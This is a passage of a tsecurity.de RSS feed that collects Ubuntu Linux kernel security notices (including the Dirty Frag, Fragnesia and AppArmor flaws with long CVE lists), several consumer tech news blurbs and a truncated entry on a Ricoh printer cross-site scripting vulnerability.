<link>https://tsecurity.de/de/3641570/unix-server/usn-8488-2-linux-kernel-raspberry-pi-vulnerabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3641570/unix-server/usn-8488-2-linux-kernel-raspberry-pi-vulnerabilities/</guid>
<pubDate>Thu, 02 Jul 2026 17:16:43 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It was discovered that some AMD processors did not properly clear data in
the floating point divider unit during speculative execution. A local
attacker could use this to expose sensitive information. (CVE-2025-54505)

Several security issues were discovered in the Linux kernel.
An attacker could possibly use these to compromise the system.
This update corrects flaws in the following subsystems:
  - ARM64 architecture;
  - x86 architecture;
  - Block layer subsystem;
  - Cryptographic API;
  - Rados block device (RBD) driver;
  - Compressed RAM block device driver;
  - Character device driver;
  - TPM device driver;
  - Hardware crypto device drivers;
  - EDAC drivers;
  - GPU drivers;
  - Greybus drivers;
  - HID subsystem;
  - Microsoft Hyper-V drivers;
  - Hardware monitoring drivers;
  - I2C subsystem;
  - IIO subsystem;
  - InfiniBand drivers;
  - Input Device core drivers;
  - LED subsystem;
  - Multiple devices driver;
  - Media drivers;
  - IBM Advanced System Management driver;
  - MTD block device drivers;
  - Network drivers;
  - Microsoft Azure Network Adapter (MANA) driver;
  - NTB driver;
  - NVME drivers;
  - Device tree and open firmware driver;
  - PCI subsystem;
  - Remote Processor subsystem;
  - SCSI subsystem;
  - SPI subsystem;
  - Realtek RTL8723BS SDIO drivers;
  - SM750 framebuffer staging driver;
  - Thermal drivers;
  - USB Gadget drivers;
  - USB over IP driver;
  - VFIO drivers;
  - Framebuffer layer;
  - 9P distributed file system;
  - AFS file system;
  - Ceph distributed file system;
  - File systems infrastructure;
  - EROFS file system;
  - Ext4 file system;
  - F2FS file system;
  - FUSE (File system in Userspace);
  - Journaling layer for block devices (JBD2);
  - NILFS2 file system;
  - File system notification infrastructure;
  - NTFS3 file system;
  - OCFS2 file system;
  - SMB network file system;
  - UDF file system;
  - XFS file system;
  - Codetag library;
  - Memory management;
  - Memory Management;
  - KVM subsystem;
  - Tracing infrastructure;
  - User-space API (UAPI);
  - io_uring subsystem;
  - Locking primitives;
  - Timer subsystem;
  - Scatterlist API;
  - Heterogeneous memory management;
  - KASAN memory debugging framework;
  - Bluetooth subsystem;
  - Ethernet bridge;
  - CAIF protocol;
  - CAN network layer;
  - Ceph Core library;
  - IPv4 networking;
  - IPv6 networking;
  - Multipath TCP;
  - Netfilter;
  - NFC subsystem;
  - Packet sockets;
  - Qualcomm IPC Router (QRTR);
  - RDS protocol;
  - RxRPC session sockets;
  - SMC sockets;
  - Stream parser;
  - Landlock security;
  - SELinux security module;
  - ALSA framework;
  - Generic PCM loopback sound driver;
  - FireWire sound drivers;
  - Creative Sound Blaster X-Fi driver;
  - QCOM ASoC drivers;
  - USB sound devices;
  - Objtool;
(CVE-2026-31532, CVE-2026-31574, CVE-2026-31575, CVE-2026-31576,
CVE-2026-31577, CVE-2026-31578, CVE-2026-31579, CVE-2026-31580,
CVE-2026-31581, CVE-2026-31582, CVE-2026-31583, CVE-2026-31584,
CVE-2026-31585, CVE-2026-31586, CVE-2026-31587, CVE-2026-31588,
CVE-2026-31589, CVE-2026-31590, CVE-2026-31591, CVE-2026-31592,
CVE-2026-31593, CVE-2026-31594, CVE-2026-31595, CVE-2026-31596,
CVE-2026-31597, CVE-2026-31598, CVE-2026-31599, CVE-2026-31600,
CVE-2026-31601, CVE-2026-31602, CVE-2026-31603, CVE-2026-31604,
CVE-2026-31605, CVE-2026-31606, CVE-2026-31607, CVE-2026-31608,
CVE-2026-31609, CVE-2026-31610, CVE-2026-31611, CVE-2026-31612,
CVE-2026-31613, CVE-2026-31614, CVE-2026-31615, CVE-2026-31616,
CVE-2026-31617, CVE-2026-31618, CVE-2026-31619, CVE-2026-31620,
CVE-2026-31621, CVE-2026-31622, CVE-2026-31623, CVE-2026-31624,
CVE-2026-31625, CVE-2026-31626, CVE-2026-31627, CVE-2026-31628,
CVE-2026-31629, CVE-2026-31686, CVE-2026-31694, CVE-2026-31696,
CVE-2026-31697, CVE-2026-31698, CVE-2026-31699, CVE-2026-31700,
CVE-2026-31701, CVE-2026-31702, CVE-2026-31703, CVE-2026-31704,
CVE-2026-31705, CVE-2026-31706, CVE-2026-31707, CVE-2026-31708,
CVE-2026-31709, CVE-2026-31710, CVE-2026-31711, CVE-2026-31712,
CVE-2026-31713, CVE-2026-31714, CVE-2026-31715, CVE-2026-31716,
CVE-2026-31717, CVE-2026-31718, CVE-2026-31719, CVE-2026-43058,
CVE-2026-43071, CVE-2026-43072, CVE-2026-43073, CVE-2026-43348,
CVE-2026-43349, CVE-2026-43350, CVE-2026-43491, CVE-2026-43493,
CVE-2026-43499, CVE-2026-43501, CVE-2026-45986, CVE-2026-45987,
CVE-2026-45988, CVE-2026-45989, CVE-2026-45990, CVE-2026-45991,
CVE-2026-45994, CVE-2026-45995, CVE-2026-45996, CVE-2026-45997,
CVE-2026-45999, CVE-2026-46001, CVE-2026-46002, CVE-2026-46003,
CVE-2026-46004, CVE-2026-46005, CVE-2026-46006, CVE-2026-46007,
CVE-2026-46008, CVE-2026-46009, CVE-2026-46010, CVE-2026-46011,
CVE-2026-46012, CVE-2026-46013, CVE-2026-46014, CVE-2026-46015,
CVE-2026-46016, CVE-2026-46018, CVE-2026-46019, CVE-2026-46020,
CVE-2026-46021, CVE-2026-46022, CVE-2026-46023, CVE-2026-46024,
CVE-2026-46025, CVE-2026-46026, CVE-2026-46027, CVE-2026-46028,
CVE-2026-46029, CVE-2026-46030, CVE-2026-46031, CVE-2026-46032,
CVE-2026-46033, CVE-2026-46034, CVE-2026-46035, CVE-2026-46036,
CVE-2026-46037, CVE-2026-46038, CVE-2026-46039, CVE-2026-46040,
CVE-2026-46041, CVE-2026-46042, CVE-2026-46043, CVE-2026-46044,
CVE-2026-46045, CVE-2026-46046, CVE-2026-46047, CVE-2026-46049,
CVE-2026-46050, CVE-2026-46051, CVE-2026-46052, CVE-2026-46053,
CVE-2026-46054, CVE-2026-46056, CVE-2026-46057, CVE-2026-46058,
CVE-2026-46059, CVE-2026-46060, CVE-2026-46061, CVE-2026-46062,
CVE-2026-46063, CVE-2026-46064, CVE-2026-46065, CVE-2026-46066,
CVE-2026-46067, CVE-2026-46068, CVE-2026-46069, CVE-2026-46070,
CVE-2026-46071, CVE-2026-46072, CVE-2026-46073, CVE-2026-46074,
CVE-2026-46075, CVE-2026-46076, CVE-2026-46077, CVE-2026-46078,
CVE-2026-46079, CVE-2026-46080, CVE-2026-46081, CVE-2026-46082,
CVE-2026-46083, CVE-2026-46084, CVE-2026-46085, CVE-2026-46086,
CVE-2026-46087, CVE-2026-46088, CVE-2026-46089, CVE-2026-46090,
CVE-2026-46091, CVE-2026-46092, CVE-2026-46093, CVE-2026-46094,
CVE-2026-46095, CVE-2026-46096, CVE-2026-46097, CVE-2026-46098,
CVE-2026-46099, CVE-2026-46100, CVE-2026-46101, CVE-2026-46102,
CVE-2026-46103, CVE-2026-46115, CVE-2026-46119, CVE-2026-46135,
CVE-2026-46137, CVE-2026-46155, CVE-2026-46185, CVE-2026-46195,
CVE-2026-46243, CVE-2026-46244, CVE-2026-46276, CVE-2026-46277,
CVE-2026-46278, CVE-2026-46279, CVE-2026-46280, CVE-2026-46281,
CVE-2026-46282, CVE-2026-46283, CVE-2026-46284, CVE-2026-46285,
CVE-2026-46286, CVE-2026-46287, CVE-2026-46288, CVE-2026-46289,
CVE-2026-46316, CVE-2026-46332, CVE-2026-52904, CVE-2026-52905,
CVE-2026-52906, CVE-2026-52907, CVE-2026-52933)]]></content:encoded>
</item>
<item>
<title><![CDATA[USN-8489-1: Linux kernel (OEM) vulnerabilities]]></title>
<description><![CDATA[It was discovered that the Linux kernel did not properly handle shared page
fragments during socket buffer operations, collectively known as Dirty
Frag. A logic flaw existed in the XFRM ESP-in-TCP subsystem and in the
RxRPC networking subsystem when processing paged fragments. A local
attacker co...]]></description>
<link>https://tsecurity.de/de/3638915/unix-server/usn-8489-1-linux-kernel-oem-vulnerabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3638915/unix-server/usn-8489-1-linux-kernel-oem-vulnerabilities/</guid>
<pubDate>Wed, 01 Jul 2026 17:16:31 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It was discovered that the Linux kernel did not properly handle shared page
fragments during socket buffer operations, collectively known as Dirty
Frag. A logic flaw existed in the XFRM ESP-in-TCP subsystem and in the
RxRPC networking subsystem when processing paged fragments. A local
attacker could use this to escalate privileges, or possibly escape a
container. (CVE-2026-43284, CVE-2026-43500, CVE-2026-45998, CVE-2026-46000)

It was discovered that a logic flaw existed in the XFRM ESP-in-TCP
subsystem in the Linux kernel when handling socket buffer fragments. This
flaw is known as Fragnesia. A local attacker could use this to escalate
privileges, or possibly escape a container. (CVE-2026-43503,
CVE-2026-46300)

Qualys discovered that a race condition existed in the ptrace subsystem of
the Linux kernel when privileged processes are exiting. An unprivileged
local attacker could use this issue to expose sensitive information.
(CVE-2026-46333)

Tristan Madani discovered that Ubuntu Linux kernel 6.8, 6.17 and 7.0
contain a memory leak when handling AppArmor notifications. A local
attacker could use this to cause resource exhaustion. (CVE-2026-47326)

Tristan Madani discovered that Ubuntu Linux kernel 6.8, 6.17 and 7.0
contain a NULL pointer dereference when handling AppArmor notifications. A
local attacker could use this to cause a kernel oops. (CVE-2026-47327)

Tristan Madani discovered that Ubuntu Linux kernel 6.8, 6.17 and 7.0
contained an invalid free when handling AppArmor notifications. A local
attacker could use this to corrupt kernel memory. (CVE-2026-47328)

Tristan Madani discovered that Ubuntu Linux kernel 6.8, 6.17 and 7.0
contained insufficient validation of AppArmor notification responses. A
local attacker could use this to allow crafted responses to be processed.
(CVE-2026-47329)

Tristan Madani discovered that Ubuntu Linux kernel 6.8, 6.17 and 7.0 used
an uninitialized variable when handling AppArmor notifications. A local
attacker could use this to cause incorrect caching of data.
(CVE-2026-47330)

Tristan Madani discovered that Ubuntu Linux kernel 6.8, 6.17 and 7.0
contained an out-of-bounds (OOB) read when handling AppArmor notifications.
A local attacker could use this to cause information disclosure of kernel
memory. (CVE-2026-47332)

Tristan Madani discovered that Ubuntu Linux kernel 6.8, 6.17 and 7.0
contained a out-of-bounds (OOB) read when handling AppArmor notifications.
A local attacker could use this to cause kernel memory corruption and,
theoretically, influence processing of AppArmor policies. (CVE-2026-47333)

Tristan Madani discovered that Ubuntu Linux kernel 6.8, 6.17 and 7.0
contained incorrect holding of locks when handling AppArmor notifications.
A local attacker could use this to cause a kernel panic or deadlock.
(CVE-2026-47334)

Tristan Madani and Trevor Lawrence have each independently discovered that
Ubuntu Linux kernel 6.8, 6.17 and 7.0 contained a NULL pointer dereference
when handling AppArmor network socket mediation. A local attacker could use
this to cause a kernel oops. (CVE-2026-47337)

Several security issues were discovered in the Linux kernel.
An attacker could possibly use these to compromise the system.
This update corrects flaws in the following subsystems:
  - ARM64 architecture;
  - x86 architecture;
  - Block layer subsystem;
  - Cryptographic API;
  - Rados block device (RBD) driver;
  - Compressed RAM block device driver;
  - Character device driver;
  - TPM device driver;
  - Hardware crypto device drivers;
  - EDAC drivers;
  - GPU drivers;
  - Greybus drivers;
  - Hardware monitoring drivers;
  - IIO subsystem;
  - InfiniBand drivers;
  - Input Device core drivers;
  - LED subsystem;
  - Multiple devices driver;
  - Media drivers;
  - IBM Advanced System Management driver;
  - MTD block device drivers;
  - Network drivers;
  - Microsoft Azure Network Adapter (MANA) driver;
  - NVME drivers;
  - Device tree and open firmware driver;
  - PCI subsystem;
  - Remote Processor subsystem;
  - SCSI subsystem;
  - SPI subsystem;
  - Thermal drivers;
  - VFIO drivers;
  - Framebuffer layer;
  - 9P distributed file system;
  - AFS file system;
  - Ceph distributed file system;
  - EROFS file system;
  - File systems infrastructure;
  - Ext4 file system;
  - Journaling layer for block devices (JBD2);
  - File system notification infrastructure;
  - NTFS3 file system;
  - OCFS2 file system;
  - Overlay file system;
  - SMB network file system;
  - UDF file system;
  - XFS file system;
  - Codetag library;
  - Memory management;
  - Tracing infrastructure;
  - io_uring subsystem;
  - Locking primitives;
  - Scatterlist API;
  - Heterogeneous memory management;
  - Bluetooth subsystem;
  - Ethernet bridge;
  - CAIF protocol;
  - Ceph Core library;
  - Networking core;
  - IPv4 networking;
  - IPv6 networking;
  - Multipath TCP;
  - Netfilter;
  - Qualcomm IPC Router (QRTR);
  - RDS protocol;
  - RxRPC session sockets;
  - SMC sockets;
  - Stream parser;
  - Landlock security;
  - SELinux security module;
  - ALSA framework;
  - Generic PCM loopback sound driver;
  - Creative Sound Blaster X-Fi driver;
  - USB sound devices;
(CVE-2026-43491, CVE-2026-43493, CVE-2026-43494, CVE-2026-43499,
CVE-2026-43501, CVE-2026-45986, CVE-2026-45987, CVE-2026-45988,
CVE-2026-45989, CVE-2026-45990, CVE-2026-45991, CVE-2026-45994,
CVE-2026-45995, CVE-2026-45996, CVE-2026-45997, CVE-2026-45999,
CVE-2026-46001, CVE-2026-46002, CVE-2026-46003, CVE-2026-46004,
CVE-2026-46005, CVE-2026-46006, CVE-2026-46007, CVE-2026-46008,
CVE-2026-46009, CVE-2026-46010, CVE-2026-46011, CVE-2026-46012,
CVE-2026-46013, CVE-2026-46014, CVE-2026-46015, CVE-2026-46016,
CVE-2026-46018, CVE-2026-46019, CVE-2026-46020, CVE-2026-46021,
CVE-2026-46022, CVE-2026-46023, CVE-2026-46024, CVE-2026-46025,
CVE-2026-46026, CVE-2026-46027, CVE-2026-46028, CVE-2026-46029,
CVE-2026-46030, CVE-2026-46031, CVE-2026-46032, CVE-2026-46033,
CVE-2026-46034, CVE-2026-46035, CVE-2026-46036, CVE-2026-46037,
CVE-2026-46038, CVE-2026-46039, CVE-2026-46040, CVE-2026-46041,
CVE-2026-46042, CVE-2026-46043, CVE-2026-46044, CVE-2026-46045,
CVE-2026-46046, CVE-2026-46047, CVE-2026-46048, CVE-2026-46049,
CVE-2026-46050, CVE-2026-46051, CVE-2026-46052, CVE-2026-46053,
CVE-2026-46054, CVE-2026-46056, CVE-2026-46057, CVE-2026-46058,
CVE-2026-46059, CVE-2026-46060, CVE-2026-46061, CVE-2026-46062,
CVE-2026-46063, CVE-2026-46064, CVE-2026-46065, CVE-2026-46066,
CVE-2026-46067, CVE-2026-46068, CVE-2026-46069, CVE-2026-46070,
CVE-2026-46071, CVE-2026-46072, CVE-2026-46073, CVE-2026-46074,
CVE-2026-46075, CVE-2026-46076, CVE-2026-46077, CVE-2026-46078,
CVE-2026-46079, CVE-2026-46080, CVE-2026-46081, CVE-2026-46082,
CVE-2026-46083, CVE-2026-46084, CVE-2026-46085, CVE-2026-46086,
CVE-2026-46087, CVE-2026-46088, CVE-2026-46089, CVE-2026-46090,
CVE-2026-46091, CVE-2026-46092, CVE-2026-46093, CVE-2026-46094,
CVE-2026-46095, CVE-2026-46096, CVE-2026-46097, CVE-2026-46098,
CVE-2026-46099, CVE-2026-46100, CVE-2026-46101, CVE-2026-46102,
CVE-2026-46103, CVE-2026-46115, CVE-2026-46119, CVE-2026-46135,
CVE-2026-46137, CVE-2026-46155, CVE-2026-46185, CVE-2026-46195,
CVE-2026-46243, CVE-2026-46244, CVE-2026-46276, CVE-2026-46277,
CVE-2026-46278, CVE-2026-46279, CVE-2026-46280, CVE-2026-46281,
CVE-2026-46282, CVE-2026-46283, CVE-2026-46284, CVE-2026-46285,
CVE-2026-46286, CVE-2026-46287, CVE-2026-46288, CVE-2026-46289,
CVE-2026-46316, CVE-2026-46323, CVE-2026-46332, CVE-2026-52904,
CVE-2026-52905, CVE-2026-52906, CVE-2026-52907, CVE-2026-52933,
CVE-2026-53174)]]></content:encoded>
</item>
<item>
<title><![CDATA[USN-8488-1: Linux kernel vulnerabilities]]></title>
<description><![CDATA[It was discovered that some AMD processors did not properly clear data in
the floating point divider unit during speculative execution. A local
attacker could use this to expose sensitive information. (CVE-2025-54505)

Several security issues were discovered in the Linux kernel.
An attacker could...]]></description>
<link>https://tsecurity.de/de/3638869/unix-server/usn-8488-1-linux-kernel-vulnerabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3638869/unix-server/usn-8488-1-linux-kernel-vulnerabilities/</guid>
<pubDate>Wed, 01 Jul 2026 16:45:42 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It was discovered that some AMD processors did not properly clear data in
the floating point divider unit during speculative execution. A local
attacker could use this to expose sensitive information. (CVE-2025-54505)

Several security issues were discovered in the Linux kernel.
An attacker could possibly use these to compromise the system.
This update corrects flaws in the following subsystems:
  - ARM64 architecture;
  - x86 architecture;
  - Block layer subsystem;
  - Cryptographic API;
  - Rados block device (RBD) driver;
  - Compressed RAM block device driver;
  - Character device driver;
  - TPM device driver;
  - Hardware crypto device drivers;
  - EDAC drivers;
  - GPU drivers;
  - Greybus drivers;
  - HID subsystem;
  - Microsoft Hyper-V drivers;
  - Hardware monitoring drivers;
  - I2C subsystem;
  - IIO subsystem;
  - InfiniBand drivers;
  - Input Device core drivers;
  - LED subsystem;
  - Multiple devices driver;
  - Media drivers;
  - IBM Advanced System Management driver;
  - MTD block device drivers;
  - Network drivers;
  - Microsoft Azure Network Adapter (MANA) driver;
  - NTB driver;
  - NVME drivers;
  - Device tree and open firmware driver;
  - PCI subsystem;
  - Remote Processor subsystem;
  - SCSI subsystem;
  - SPI subsystem;
  - Realtek RTL8723BS SDIO drivers;
  - SM750 framebuffer staging driver;
  - Thermal drivers;
  - USB Gadget drivers;
  - USB over IP driver;
  - VFIO drivers;
  - Framebuffer layer;
  - 9P distributed file system;
  - AFS file system;
  - Ceph distributed file system;
  - File systems infrastructure;
  - EROFS file system;
  - Ext4 file system;
  - F2FS file system;
  - FUSE (File system in Userspace);
  - Journaling layer for block devices (JBD2);
  - NILFS2 file system;
  - File system notification infrastructure;
  - NTFS3 file system;
  - OCFS2 file system;
  - SMB network file system;
  - UDF file system;
  - XFS file system;
  - Codetag library;
  - Memory management;
  - Memory Management;
  - KVM subsystem;
  - Tracing infrastructure;
  - User-space API (UAPI);
  - io_uring subsystem;
  - Locking primitives;
  - Timer subsystem;
  - Scatterlist API;
  - Heterogeneous memory management;
  - KASAN memory debugging framework;
  - Bluetooth subsystem;
  - Ethernet bridge;
  - CAIF protocol;
  - CAN network layer;
  - Ceph Core library;
  - IPv4 networking;
  - IPv6 networking;
  - Multipath TCP;
  - Netfilter;
  - NFC subsystem;
  - Packet sockets;
  - Qualcomm IPC Router (QRTR);
  - RDS protocol;
  - RxRPC session sockets;
  - SMC sockets;
  - Stream parser;
  - Landlock security;
  - SELinux security module;
  - ALSA framework;
  - Generic PCM loopback sound driver;
  - FireWire sound drivers;
  - Creative Sound Blaster X-Fi driver;
  - QCOM ASoC drivers;
  - USB sound devices;
  - Objtool;
(CVE-2026-31532, CVE-2026-31574, CVE-2026-31575, CVE-2026-31576,
CVE-2026-31577, CVE-2026-31578, CVE-2026-31579, CVE-2026-31580,
CVE-2026-31581, CVE-2026-31582, CVE-2026-31583, CVE-2026-31584,
CVE-2026-31585, CVE-2026-31586, CVE-2026-31587, CVE-2026-31588,
CVE-2026-31589, CVE-2026-31590, CVE-2026-31591, CVE-2026-31592,
CVE-2026-31593, CVE-2026-31594, CVE-2026-31595, CVE-2026-31596,
CVE-2026-31597, CVE-2026-31598, CVE-2026-31599, CVE-2026-31600,
CVE-2026-31601, CVE-2026-31602, CVE-2026-31603, CVE-2026-31604,
CVE-2026-31605, CVE-2026-31606, CVE-2026-31607, CVE-2026-31608,
CVE-2026-31609, CVE-2026-31610, CVE-2026-31611, CVE-2026-31612,
CVE-2026-31613, CVE-2026-31614, CVE-2026-31615, CVE-2026-31616,
CVE-2026-31617, CVE-2026-31618, CVE-2026-31619, CVE-2026-31620,
CVE-2026-31621, CVE-2026-31622, CVE-2026-31623, CVE-2026-31624,
CVE-2026-31625, CVE-2026-31626, CVE-2026-31627, CVE-2026-31628,
CVE-2026-31629, CVE-2026-31686, CVE-2026-31694, CVE-2026-31696,
CVE-2026-31697, CVE-2026-31698, CVE-2026-31699, CVE-2026-31700,
CVE-2026-31701, CVE-2026-31702, CVE-2026-31703, CVE-2026-31704,
CVE-2026-31705, CVE-2026-31706, CVE-2026-31707, CVE-2026-31708,
CVE-2026-31709, CVE-2026-31710, CVE-2026-31711, CVE-2026-31712,
CVE-2026-31713, CVE-2026-31714, CVE-2026-31715, CVE-2026-31716,
CVE-2026-31717, CVE-2026-31718, CVE-2026-31719, CVE-2026-43058,
CVE-2026-43071, CVE-2026-43072, CVE-2026-43073, CVE-2026-43348,
CVE-2026-43349, CVE-2026-43350, CVE-2026-43491, CVE-2026-43493,
CVE-2026-43499, CVE-2026-43501, CVE-2026-45986, CVE-2026-45987,
CVE-2026-45988, CVE-2026-45989, CVE-2026-45990, CVE-2026-45991,
CVE-2026-45994, CVE-2026-45995, CVE-2026-45996, CVE-2026-45997,
CVE-2026-45999, CVE-2026-46001, CVE-2026-46002, CVE-2026-46003,
CVE-2026-46004, CVE-2026-46005, CVE-2026-46006, CVE-2026-46007,
CVE-2026-46008, CVE-2026-46009, CVE-2026-46010, CVE-2026-46011,
CVE-2026-46012, CVE-2026-46013, CVE-2026-46014, CVE-2026-46015,
CVE-2026-46016, CVE-2026-46018, CVE-2026-46019, CVE-2026-46020,
CVE-2026-46021, CVE-2026-46022, CVE-2026-46023, CVE-2026-46024,
CVE-2026-46025, CVE-2026-46026, CVE-2026-46027, CVE-2026-46028,
CVE-2026-46029, CVE-2026-46030, CVE-2026-46031, CVE-2026-46032,
CVE-2026-46033, CVE-2026-46034, CVE-2026-46035, CVE-2026-46036,
CVE-2026-46037, CVE-2026-46038, CVE-2026-46039, CVE-2026-46040,
CVE-2026-46041, CVE-2026-46042, CVE-2026-46043, CVE-2026-46044,
CVE-2026-46045, CVE-2026-46046, CVE-2026-46047, CVE-2026-46049,
CVE-2026-46050, CVE-2026-46051, CVE-2026-46052, CVE-2026-46053,
CVE-2026-46054, CVE-2026-46056, CVE-2026-46057, CVE-2026-46058,
CVE-2026-46059, CVE-2026-46060, CVE-2026-46061, CVE-2026-46062,
CVE-2026-46063, CVE-2026-46064, CVE-2026-46065, CVE-2026-46066,
CVE-2026-46067, CVE-2026-46068, CVE-2026-46069, CVE-2026-46070,
CVE-2026-46071, CVE-2026-46072, CVE-2026-46073, CVE-2026-46074,
CVE-2026-46075, CVE-2026-46076, CVE-2026-46077, CVE-2026-46078,
CVE-2026-46079, CVE-2026-46080, CVE-2026-46081, CVE-2026-46082,
CVE-2026-46083, CVE-2026-46084, CVE-2026-46085, CVE-2026-46086,
CVE-2026-46087, CVE-2026-46088, CVE-2026-46089, CVE-2026-46090,
CVE-2026-46091, CVE-2026-46092, CVE-2026-46093, CVE-2026-46094,
CVE-2026-46095, CVE-2026-46096, CVE-2026-46097, CVE-2026-46098,
CVE-2026-46099, CVE-2026-46100, CVE-2026-46101, CVE-2026-46102,
CVE-2026-46103, CVE-2026-46115, CVE-2026-46119, CVE-2026-46135,
CVE-2026-46137, CVE-2026-46155, CVE-2026-46185, CVE-2026-46195,
CVE-2026-46243, CVE-2026-46244, CVE-2026-46276, CVE-2026-46277,
CVE-2026-46278, CVE-2026-46279, CVE-2026-46280, CVE-2026-46281,
CVE-2026-46282, CVE-2026-46283, CVE-2026-46284, CVE-2026-46285,
CVE-2026-46286, CVE-2026-46287, CVE-2026-46288, CVE-2026-46289,
CVE-2026-46316, CVE-2026-46332, CVE-2026-52904, CVE-2026-52905,
CVE-2026-52906, CVE-2026-52907, CVE-2026-52933)]]></content:encoded>
</item>
<item>
<title><![CDATA[Forget the Grill. This Countertop Appliance Is Even Better During a Heat Wave]]></title>
<description><![CDATA[When it's too hot to grill or turn on the range, I turn to this speedy, compact cooker to whip up meals without overheating the kitchen.]]></description>
<link>https://tsecurity.de/de/3637957/it-nachrichten/forget-the-grill-this-countertop-appliance-is-even-better-during-a-heat-wave/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3637957/it-nachrichten/forget-the-grill-this-countertop-appliance-is-even-better-during-a-heat-wave/</guid>
<pubDate>Wed, 01 Jul 2026 11:18:26 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[When it's too hot to grill or turn on the range, I turn to this speedy, compact cooker to whip up meals without overheating the kitchen.]]></content:encoded>
</item>
<item>
<title><![CDATA[Here's How to Recycle Your Old Laptop, PC and Printer]]></title>
<description><![CDATA[From old PCs to dusty printers, here's where to drop off your outdated tech without paying a cent.]]></description>
<link>https://tsecurity.de/de/3637152/it-nachrichten/heres-how-to-recycle-your-old-laptop-pc-and-printer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3637152/it-nachrichten/heres-how-to-recycle-your-old-laptop-pc-and-printer/</guid>
<pubDate>Wed, 01 Jul 2026 03:02:12 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[From old PCs to dusty printers, here's where to drop off your outdated tech without paying a cent.]]></content:encoded>
</item>
<item>
<title><![CDATA[The HP Envy 6555e is a 'slick printer' that's ideal for home and student printing — and Best Buy just dropped the price under $90]]></title>
<description><![CDATA[The HP Envy 6555e is half price at Best Buy right now — here's who should (and shouldn't) buy it.]]></description>
<link>https://tsecurity.de/de/3636419/it-nachrichten/the-hp-envy-6555e-is-a-slick-printer-thats-ideal-for-home-and-student-printing-and-best-buy-just-dropped-the-price-under-90/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3636419/it-nachrichten/the-hp-envy-6555e-is-a-slick-printer-thats-ideal-for-home-and-student-printing-and-best-buy-just-dropped-the-price-under-90/</guid>
<pubDate>Tue, 30 Jun 2026 19:17:42 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The HP Envy 6555e is half price at Best Buy right now — here's who should (and shouldn't) buy it.]]></content:encoded>
</item>
<item>
<title><![CDATA[xTool O1 Omni vorgestellt: All-in-One-Drucker bedruckt nahezu jedes Material]]></title>
<description><![CDATA[xTool ist bekannt für hochwertige Lasergravur- und Schneidegeräte. Das Unternehmen produziert Desktop-Laser wie den F2 Ultra, CO2-Laser wie den P3 und Multifunktionsgeräte wie den M1 Ultra. Mit dem O1 Omni Printer wagt man sich in eine neue Hardware-Kategorie vor: Man...Zum Beitrag: xTool O1 Omni...]]></description>
<link>https://tsecurity.de/de/3635795/it-nachrichten/xtool-o1-omni-vorgestellt-all-in-one-drucker-bedruckt-nahezu-jedes-material/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635795/it-nachrichten/xtool-o1-omni-vorgestellt-all-in-one-drucker-bedruckt-nahezu-jedes-material/</guid>
<pubDate>Tue, 30 Jun 2026 15:46:35 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[xTool ist bekannt für hochwertige Lasergravur- und Schneidegeräte. Das Unternehmen produziert Desktop-Laser wie den F2 Ultra, CO2-Laser wie den P3 und Multifunktionsgeräte wie den M1 Ultra. Mit dem O1 Omni Printer wagt man sich in eine neue Hardware-Kategorie vor: Man...<p>Zum Beitrag: <a href="https://stadt-bremerhaven.de/xtool-o1-omni-vorgestellt-all-in-one-drucker-bedruckt-nahezu-jedes-material/">xTool O1 Omni vorgestellt: All-in-One-Drucker bedruckt nahezu jedes Material</a>
</p><p>
Wo du uns folgen kannst:
<a href="http://www.facebook.com/CaschysBlog">Facebook</a>, <a href="https://www.reddit.com/r/CaschysBlog/">Reddit</a>, <a href="https://news.google.com/publications/CAAqMQgKIitDQklTR2dnTWFoWUtGSE4wWVdSMExXSnlaVzFsY21oaGRtVnVMbVJsS0FBUAE?ceid=DE:de&amp;oc=3">Google News</a>, <a href="https://x.com/CaschysBlog">X</a>, <a href="https://www.threads.com/@caschysblog">Threads</a>
<br>
</p><div>
    <strong>Auf dem Laufenden bleiben?</strong>
    <br>
    <a href="https://www.google.com/preferences/source?q=stadt-bremerhaven.de">Fügt uns doch bei Google als bevorzugte Quelle hinzu!</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-56809 | Ricoh Company Laser Printer/MFP Ricoh Web Image Monitor cross site scripting (icoh-2026-000005 / EUVD-2026-40255)]]></title>
<description><![CDATA[A vulnerability, which was classified as problematic, was found in Ricoh Company Laser Printer and MFP. This issue affects some unknown processing of the component Ricoh Web Image Monitor. The manipulation results in cross site scripting.

This vulnerability is identified as CVE-2026-56809. The a...]]></description>
<link>https://tsecurity.de/de/3635090/sicherheitsluecken/cve-2026-56809-ricoh-company-laser-printermfp-ricoh-web-image-monitor-cross-site-scripting-icoh-2026-000005-euvd-2026-40255/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635090/sicherheitsluecken/cve-2026-56809-ricoh-company-laser-printermfp-ricoh-web-image-monitor-cross-site-scripting-icoh-2026-000005-euvd-2026-40255/</guid>
<pubDate>Tue, 30 Jun 2026 11:38:43 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">problematic</a>, was found in <a href="https://vuldb.com/product/ricoh_company:laser_printer">Ricoh Company Laser Printer and MFP</a>. This issue affects some unknown processing of the component <em>Ricoh Web Image Monitor</em>. The manipulation results in cross site scripting.

